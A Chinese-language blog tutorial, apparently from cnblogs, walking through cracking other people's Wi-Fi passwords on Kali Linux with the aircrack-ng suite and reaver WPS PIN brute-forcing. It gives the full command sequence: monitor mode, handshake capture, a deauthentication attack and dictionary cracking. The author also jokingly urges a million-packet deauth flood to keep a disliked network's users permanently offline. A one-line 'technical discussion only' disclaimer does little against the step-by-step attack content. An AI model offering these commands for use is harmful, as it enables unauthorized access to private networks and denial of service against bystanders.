• Kali 爆破和非爆破无线路由账号和密码+让别人无线掉线


    这篇日志基于别人一篇BT5的破解,Kali同样适用.附加Pin码破解

    1.ifconfig看看自己的无线网卡的名称,一般是wlan0或者eth0,后文中根据实际情况执行命令。

    2.airodump-ng wlan0 扫描当前所有路由器

    3.开启无线监控

    airmon-ng start wlan0 6

    注:wlan0为你的无线设备名称  6为你要开启的信道(但是这里的6其实并没有那么重要的说)

    这一步你可能会看到提示有XXXX XXXX进程影响,没关系,kill XXX XXX    XXX为给出的进程号,然后重新执行上句直到不报错

    4.因为我们已经选择好了目标,我们就直奔目标AP,开始用BT5对其进行监控

    airodump-ng -w nenew -c 4 --bssid AP‘s MAC mon0

    这时候你应该可以看到如下图示:

    1

    5.根据上图,我们可以找到四个Client客户端的MAC地址,从里面随便选个(最好选择活跃点儿的)。打开一个新的终端,上一个终端不要关闭,后面还需要用到。在新终端中输入:
    aireplay-ng -0 10 -a AP’s MAC -c CP’s MAC mon0

    在这里插一句话,如果你破解不了当前路由器或者看这个ssid很不爽,这里将上述设置的10改成很大的数字,别人无限掉线~ 嘿嘿是不是很坏呢。

    eg:aireplay-ng -0 1000000 -a AP’s MAC -c CP’s MAC mon0

     

    执行一次看第一个终端中是否出现了下图所示的标志WAP Handshake 。如果出现了,那么恭喜,你离成功已经不远了。如果没有出现就继续重复5的命令就ok了,直到出现握手。

    6.对BT5握手抓到的包进行破解工作

    aircrack-ng -w password.txt -b AP’s MAC nenew.cap

    其中的password.txt为我们需要预置的字典文件,字典文件网上很多,搜搜就有了。奶牛也会放出自己的一些字典文件提供下载,继续关注咯。

    这里推荐一个字典生成工具,木头超级字典生成工具。

    最后上成果图

    本文只做技术讨论,不要用于非法用途,否则后果自负。

    Way2 

    基于前面拿到的路由器Mac地址

    1.airodump-ng wlan0 扫描当前所有路由器

    2.wash -i wlan0 -c 显示当前路由器

    3.wash -i wlan0 -c 11 -C -s 11信道11,查看WPS是否关闭 (No)即可以,只有开启的才使用

    4.reaver -i wlan0 -b (上面的地址)T'sMac --fail-wait=360  (出现选项输n)

    Eg:reaver -i wlan0 -b 00:11:22:33:44:55:66 --fail-wait=360

    剩下的就是默默的等待,pin码对了既可以破解.感觉没有暴力字典好啊~

  • 相关阅读:
    【20220322】连岳摘抄
    【20220323】蓝天白云才是生活主调
    【ceph集群】构建rpm包
    C/C++ 将ShellCode注入进程内存
    算法:第一章:SnowFlake算法(分布式系统中生成唯一的ID的算法)SnowFlake每秒能够产生26万ID左右
    【设计一个刚好在一秒堆溢出的程序】
    模板引擎:第三章:使用Freemark做企业级SEO推广
    使用@Value给属性参数赋值
    解决:No active profile set, falling back to default profiles: default
    使用@ControllerAdvice进行全局异常处理关键代码
  • 原文地址:https://www.cnblogs.com/i0ject/p/3656526.html
Copyright © 2020-2023  润新知